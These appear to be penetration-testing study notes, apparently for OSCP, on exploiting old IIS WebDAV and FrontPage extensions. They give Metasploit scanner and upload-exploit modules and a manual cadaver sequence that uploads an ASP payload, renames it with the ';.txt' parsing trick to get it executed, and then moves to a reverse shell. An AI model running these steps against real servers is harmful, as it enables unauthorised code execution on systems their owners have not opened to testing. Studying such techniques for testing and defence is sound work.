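# Check on the web port (usually 80):
# FrontPage Server Extensions _vti_pvt files (OSCP notes); if readable, they can disclose FrontPage configuration and version details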
/_vti_pvt/access.cnf
/_vti_pvt/service.cnf
/_vti_inf.htm
WebDAV Exploitation using Metasploit
# Checking WebDAV using metasploit
use auxiliary/scanner/http/webdav_scanner
set rhosts <IP>
run
# Content discovery using metasploit
use auxiliary/scanner/http/webdav_website_content
set rhosts <IP>
run
# Checking for the MS09-020 WebDAV Unicode authentication bypass using metasploit
use auxiliary/scanner/http/ms09_020_webdav_unicode_bypass
set rhosts <IP>
run
# Upload exploitation using metasploit
use exploit/windows/iis/iis_webdav_upload_asp
Manual WebDAV exploitation (cadaver)
cadaver http://IP/
# Goal: upload a file to the IIS server.
ls
# Find a directory where we can upload.
cd <path>
# Test for upload
put /path/to/test.asp test.asp
# Upload payload
put /path/to/payload.asp longnamebrotesttest123456789.txt
# Copy and rename payload
copy longnamebrotesttest123456789.txt longnamebrotesttest123456789.asp;.txt
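# Access the file in the directory it was uploaded to (_vti_pvt in this example); it should execute the ASP content.
# Legacy IIS (6.0-era) stops parsing the file name at ';' and handles it as .asp; denying script/execute permission on WebDAV-writable directories prevents this.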
http://IP/_vti_pvt/longnamebrotesttest123456789.asp%3b.txt
# Then go for reverse shell